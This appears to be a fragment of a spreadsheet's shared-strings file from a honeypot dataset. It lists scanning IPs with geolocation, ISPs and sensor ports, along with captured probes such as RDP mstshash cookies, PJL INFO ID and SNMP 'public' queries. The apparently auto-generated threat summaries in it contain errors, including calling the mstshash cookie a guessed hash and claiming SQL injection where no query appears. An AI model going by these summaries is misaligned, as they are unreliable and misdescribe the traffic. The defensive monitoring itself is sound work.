    <t>The data suggests that there was no activity detected for the TELNET service, indicating potential probing or scanning attempts may have been made to identify vulnerabilities. However, since no connection was established, it is unclear if malicious intent was involved. The absence of activity does not necessarily indicate malicious behavior but could be a sign of reconnaissance efforts. &amp;&amp; No incoming TELNET connections detected, possible idle or reconnaissance attempt by an attacker. 
Connection attempt may be a precursor to further malicious activity such as exploitation or data exfiltration. 
This could indicate an attacker probing the system for vulnerabilities.</t>
  </si>
  <si>
    <t>bb19bf84f2e54cfcf9f3bd7c9634f5f2</t>
  </si>
  <si>
    <t>120.61.82.246</t>
  </si>
  <si>
    <t>::ffff:783d:52f6</t>
  </si>
  <si>
    <t>6bf5b40cfc7eec5c367f8b0a6701a202</t>
  </si>
  <si>
    <t>5.11.148.173</t>
  </si>
  <si>
    <t>Maltepe</t>
  </si>
  <si>
    <t>741763</t>
  </si>
  <si>
    <t>40.9439</t>
  </si>
  <si>
    <t>29.1554</t>
  </si>
  <si>
    <t>TURKCELL ILETISIM HIZMETLERI A.S.</t>
  </si>
  <si>
    <t>::ffff:50b:94ad</t>
  </si>
  <si>
    <t>Unknown user attempted to connect to telnet service, but was met with an error or no response, as indicated by "NA" for Data_TELNET. This could be due to a misconfigured service or malicious probing of the system. The outcome is unclear, making it difficult to determine intent.</t>
  </si>
  <si>
    <t>4231317dbdf1cf2e8560f0385a74dda8</t>
  </si>
  <si>
    <t>103.159.99.167</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;4152&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Mhaswad</t>
  </si>
  <si>
    <t>1263083</t>
  </si>
  <si>
    <t>17.6334</t>
  </si>
  <si>
    <t>74.7871</t>
  </si>
  <si>
    <t>149240</t>
  </si>
  <si>
    <t>Megatel Networks Private Limited</t>
  </si>
  <si>
    <t>Sankalp Network Private Limited</t>
  </si>
  <si>
    <t>::ffff:679f:63a7</t>
  </si>
  <si>
    <t>There is no data provided, so there's nothing to analyze or describe.</t>
  </si>
  <si>
    <t>cb8d0bd824f6cafe9319dd0bc24c735e</t>
  </si>
  <si>
    <t>103.86.106.208</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;25&amp;&amp;54240</t>
  </si>
  <si>
    <t>Yelahanka</t>
  </si>
  <si>
    <t>1252758</t>
  </si>
  <si>
    <t>13.1007</t>
  </si>
  <si>
    <t>77.5963</t>
  </si>
  <si>
    <t>147279</t>
  </si>
  <si>
    <t>OPTO COMMUNICATIONS PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Opto Communications Private Limited</t>
  </si>
  <si>
    <t>6061EWS3rd floor63 Expt house 4th phase707 group</t>
  </si>
  <si>
    <t>2017-02-21</t>
  </si>
  <si>
    <t>SBNETWORKS</t>
  </si>
  <si>
    <t>::ffff:6756:6ad0</t>
  </si>
  <si>
    <t>9087127918acbea6447f5c69d087684e</t>
  </si>
  <si>
    <t>117.217.36.108</t>
  </si>
  <si>
    <t>::ffff:75d9:246c</t>
  </si>
  <si>
    <t>ba55cba318de2068bcb701f1d4917eaa</t>
  </si>
  <si>
    <t>117.255.24.104</t>
  </si>
  <si>
    <t>WiMAX-BB</t>
  </si>
  <si>
    <t>::ffff:75ff:1868</t>
  </si>
  <si>
    <t>No activity was recorded for Telnet service. This suggests that either the service is not active or no attempts were made to access it. The absence of activity does not necessarily indicate security, but it could imply a lack of interest from malicious actors.</t>
  </si>
  <si>
    <t>71afd0b300979fdfe7a16c44d595be21</t>
  </si>
  <si>
    <t>73.191.126.37</t>
  </si>
  <si>
    <t>c-73-191-126-37.hsd1.md.comcast.net</t>
  </si>
  <si>
    <t>Maryland</t>
  </si>
  <si>
    <t>Anne Arundel</t>
  </si>
  <si>
    <t>Gambrills</t>
  </si>
  <si>
    <t>4355899</t>
  </si>
  <si>
    <t>21054</t>
  </si>
  <si>
    <t>39.067</t>
  </si>
  <si>
    <t>-76.6655</t>
  </si>
  <si>
    <t>COMCAST-7922</t>
  </si>
  <si>
    <t>Comcast Cable Communications</t>
  </si>
  <si>
    <t>Comcast IP Services, L.L.C.</t>
  </si>
  <si>
    <t>1997-09-25 04:00:00</t>
  </si>
  <si>
    <t>2025-09-24 04:00:00</t>
  </si>
  <si>
    <t>2024-09-20 05:10:59</t>
  </si>
  <si>
    <t>['DNS101.COMCAST.NET', 'DNS102.COMCAST.NET', 'DNS103.COMCAST.NET', 'DNS104.COMCAST.NET', 'DNS105.COMCAST.NET']</t>
  </si>
  <si>
    <t>CSC Corporate Domains, Inc.</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']</t>
  </si>
  <si>
    <t>Comcast Domains</t>
  </si>
  <si>
    <t>['domainabuse@cscglobal.com', 'hostmaster@comcast.com']</t>
  </si>
  <si>
    <t>1701 JFK Blvd.</t>
  </si>
  <si>
    <t>::ffff:49bf:7e25</t>
  </si>
  <si>
    <t>Possible attempt to login to a web service with credentials from an unfamiliar location. User agent suggests a Windows system and Google Chrome browser version 135.0.0.0 which is likely outdated or fake. This could be indicative of a brute force attack or phishing attempt. &amp;&amp; This activity appears to be an automated login attempt from a browser likely controlled by malware or used in a botnet operation.
The user agent string suggests the attacker is using a fake identity and potentially exploiting vulnerabilities for unauthorized access.
A legitimate user would not have such an outdated version of Chrome.</t>
  </si>
  <si>
    <t>0fcd7068143cba2a67fce37803fe7342</t>
  </si>
  <si>
    <t>171.244.61.123</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H6&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>3389&amp;&amp;5900</t>
  </si>
  <si>
    <t>38731</t>
  </si>
  <si>
    <t>Vietel - CHT Compamy Ltd</t>
  </si>
  <si>
    <t>stshash&amp;&amp;connection</t>
  </si>
  <si>
    <t>{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:abf4:3d7b</t>
  </si>
  <si>
    <t>This data suggests an attempted brute-force login to a Windows service, likely with the intention of exploiting it for malicious purposes, potentially gaining unauthorized access or spreading malware. The attacker is trying to guess the hash value, which could indicate a credential cracking attempt. This activity may be part of a larger attack targeting multiple services on the same system. &amp;&amp; Possible brute-force login attempt detected for RDP service. Activity suggests an unauthorized user trying to gain access. No successful login yet, further investigation needed. &amp;&amp; This data suggests an attempt to authenticate with a valid stshash hash, which is a common tactic used by malicious actors to gain unauthorized access. This could be an attempt to brute force login credentials or exploit a vulnerability in the system's authentication mechanism. The presence of a valid hash also implies that the attacker may have obtained it through previous reconnaissance efforts.</t>
  </si>
  <si>
    <t>RDP Bruteforce</t>
  </si>
  <si>
    <t>904ee7c2324d579b26228718eba787ae</t>
  </si>
  <si>
    <t>147.185.132.34</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_NTP_H8&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_SIP_H34&amp;&amp;SMA-LAB_NTP_H46&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_SOCKS5_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;13345&amp;&amp;49857&amp;&amp;143&amp;&amp;55560&amp;&amp;23&amp;&amp;1080&amp;&amp;161&amp;&amp;389&amp;&amp;3389&amp;&amp;1521&amp;&amp;65160&amp;&amp;5432&amp;&amp;NA&amp;&amp;445&amp;&amp;54944&amp;&amp;22&amp;&amp;6379&amp;&amp;110&amp;&amp;1433&amp;&amp;3306&amp;&amp;5900&amp;&amp;9100&amp;&amp;52413&amp;&amp;443&amp;&amp;6667&amp;&amp;49442&amp;&amp;52799&amp;&amp;51341&amp;&amp;49226&amp;&amp;80&amp;&amp;51535</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;query&amp;&amp;NA&amp;&amp;command&amp;&amp;request&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SImRFmMJf'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eThzxy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kbKTTq'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GueELWxjN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oUITHh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tvsTau'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XiqRRvUPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=imfFia'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WdnNmt'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64110)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64120)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64136)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64072)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64074)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64076)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64892)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64898)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,64902)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58762)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58778)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTPS:{'Host': 'vitamin-tourist.bnr.la', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,60248)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,63258)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,63274)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cUyUmtKgv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OLGWjs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=euEpNh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fOMmwdxHx'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58662)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58668)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,58674)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,61692)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,61700)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,61710)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,59306)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.34,59316)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qNSvSXmZx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wlsdzg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DCXlExxAo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=djcfPw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AwzzDd'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:8422</t>
  </si>
  <si>
    <t>This log indicates an attempted connection to a database service, likely an oracle database, which may be a sign of malicious probing or reconnaissance activity by attackers. 
The attacker might be attempting to exploit vulnerabilities in the database or gain unauthorized access. 
This could potentially lead to data theft or other malicious activities if successful.</t>
  </si>
  <si>
    <t>35514c3bd069edcfff9eafed0065bd6e</t>
  </si>
  <si>
    <t>118.47.49.160</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>Changwon-si</t>
  </si>
  <si>
    <t>Changwon-si (Uichang-gu)</t>
  </si>
  <si>
    <t>1846322</t>
  </si>
  <si>
    <t>35.3119</t>
  </si>
  <si>
    <t>128.649</t>
  </si>
  <si>
    <t>::ffff:762f:31a0</t>
  </si>
  <si>
    <t>d2bb4fc0a992e18693a9806112da7b25</t>
  </si>
  <si>
    <t>152.32.140.12</t>
  </si>
  <si>
    <t>&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MYSQL_H8&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_IMAP_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;3306&amp;&amp;1433&amp;&amp;33431&amp;&amp;445&amp;&amp;35682&amp;&amp;5432&amp;&amp;25&amp;&amp;37854&amp;&amp;47902&amp;&amp;23&amp;&amp;1521&amp;&amp;44704&amp;&amp;9100&amp;&amp;39643&amp;&amp;110&amp;&amp;1080</t>
  </si>
  <si>
    <t>NG</t>
  </si>
  <si>
    <t>Nigeria</t>
  </si>
  <si>
    <t>LA</t>
  </si>
  <si>
    <t>Lagos</t>
  </si>
  <si>
    <t>2332459</t>
  </si>
  <si>
    <t>6.52438</t>
  </si>
  <si>
    <t>3.37921</t>
  </si>
  <si>
    <t>UCloud (HK) Holdings Group Limited</t>
  </si>
  <si>
    <t>1992-01-10</t>
  </si>
  <si>
    <t>UCLOUD-NG</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'TLRMTVNTUAABAAAAB4IIOAAAAAAAAAAAAAAAAAAAAAA=', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,36858)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,52598)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,34908)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,51550)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,35752)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38302)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,95.164.21.98)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38312)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38324)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38340)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38348)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38352)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,38356)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,58884)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,58886)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:Incoming connection (152.32.140.12,58896)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:9820:8c0c</t>
  </si>
  <si>
    <t>ecacb5d5fe028d18f91f6a1081043926</t>
  </si>
  <si>
    <t>78.97.106.144</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;55987&amp;&amp;23&amp;&amp;59490&amp;&amp;NA</t>
  </si>
  <si>
    <t>NT</t>
  </si>
  <si>
    <t>Neamț County</t>
  </si>
  <si>
    <t>Municipiul Roman</t>
  </si>
  <si>
    <t>Roman</t>
  </si>
  <si>
    <t>668732</t>
  </si>
  <si>
    <t>611001</t>
  </si>
  <si>
    <t>46.9334</t>
  </si>
  <si>
    <t>26.9265</t>
  </si>
  <si>
    <t>12302</t>
  </si>
  <si>
    <t>Vodafone Romania S.A.</t>
  </si>
  <si>
    <t>UPC Romania</t>
  </si>
  <si>
    <t>::ffff:4e61:6a90</t>
  </si>
  <si>
    <t>No log data available, therefore cannot determine malicious activity.</t>
  </si>
  <si>
    <t>9fb5ac1bc3374ce2580afa1969602d24</t>
  </si>
  <si>
    <t>108.41.83.90</t>
  </si>
  <si>
    <t>pool-108-41-83-90.nycmny.fios.verizon.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9100&amp;&amp;445&amp;&amp;631&amp;&amp;443&amp;&amp;80&amp;&amp;1080&amp;&amp;389&amp;&amp;14143&amp;&amp;10737&amp;&amp;23&amp;&amp;NA&amp;&amp;37524</t>
  </si>
  <si>
    <t>Verizon Communications</t>
  </si>
  <si>
    <t>MCI Communications Services, Inc. d/b/a Verizon Business</t>
  </si>
  <si>
    <t>::ffff:6c29:535a</t>
  </si>
  <si>
    <t>56d95eea1ece95625c39b14bb91b1529</t>
  </si>
  <si>
    <t>103.80.153.177</t>
  </si>
  <si>
    <t>North East</t>
  </si>
  <si>
    <t>Delhi (Block C)</t>
  </si>
  <si>
    <t>1273294</t>
  </si>
  <si>
    <t>110007</t>
  </si>
  <si>
    <t>28.7299</t>
  </si>
  <si>
    <t>77.2643</t>
  </si>
  <si>
    <t>140171</t>
  </si>
  <si>
    <t>Reis Network Solutions</t>
  </si>
  <si>
    <t>Pimoony Broadband Servivices Pvt. Ltd</t>
  </si>
  <si>
    <t>Pimoony Broadband Services Pvt Ltd</t>
  </si>
  <si>
    <t>2016-11-30</t>
  </si>
  <si>
    <t>PIMOONYS</t>
  </si>
  <si>
    <t>::ffff:6750:99b1</t>
  </si>
  <si>
    <t>This suggests an attempt to exploit SQL injection vulnerability, where an attacker is trying to inject malicious SQL code into the database. 
The attacker may be attempting to extract sensitive information or gain unauthorized access.
No valid MSSQL query was executed.</t>
  </si>
  <si>
    <t>ffbbbadfcdb66e1805b52bffc09c070e</t>
  </si>
  <si>
    <t>117.192.138.120</t>
  </si>
  <si>
    <t>::ffff:75c0:8a78</t>
  </si>
  <si>
    <t>4caf22401a43e70b423d5843852e5794</t>
  </si>
  <si>
    <t>117.223.47.140</t>
  </si>
  <si>
    <t>::ffff:75df:2f8c</t>
  </si>
  <si>
    <t>0c6ab8393a6ffc361f1d28ed0c0bb527</t>
  </si>
  <si>
    <t>59.178.146.253</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>29866&amp;&amp;23</t>
  </si>
  <si>
    <t>Hisar</t>
  </si>
  <si>
    <t>1270022</t>
  </si>
  <si>
    <t>29.1539</t>
  </si>
  <si>
    <t>75.7229</t>
  </si>
  <si>
    <t>::ffff:3bb2:92fd</t>
  </si>
  <si>
    <t>No malicious activity detected for Telnet service as the log indicates 'not available' or inactive connections. This suggests either no attempts were made to use the service or it was not set up to monitor Telnet activity. Normal and expected outcome in this case. &amp;&amp; No TELNET connections were detected during this time period, indicating that there was no attempt to connect via this protocol. No malicious activity is indicated by the lack of any connection attempts. This suggests a quiet period with no suspicious network activity.</t>
  </si>
  <si>
    <t>a53ea60eb58d7f31d488993c17779ca6</t>
  </si>
  <si>
    <t>117.204.202.232</t>
  </si>
  <si>
    <t>::ffff:75cc:cae8</t>
  </si>
  <si>
    <t>64e7ec3377713412600b2b9dff187184</t>
  </si>
  <si>
    <t>59.91.119.70</t>
  </si>
  <si>
    <t>::ffff:3b5b:7746</t>
  </si>
  <si>
    <t>04581a12fe1cba16b224baec0f488023</t>
  </si>
  <si>
    <t>220.132.31.158</t>
  </si>
  <si>
    <t>220-132-31-158.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_DNS_H26&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
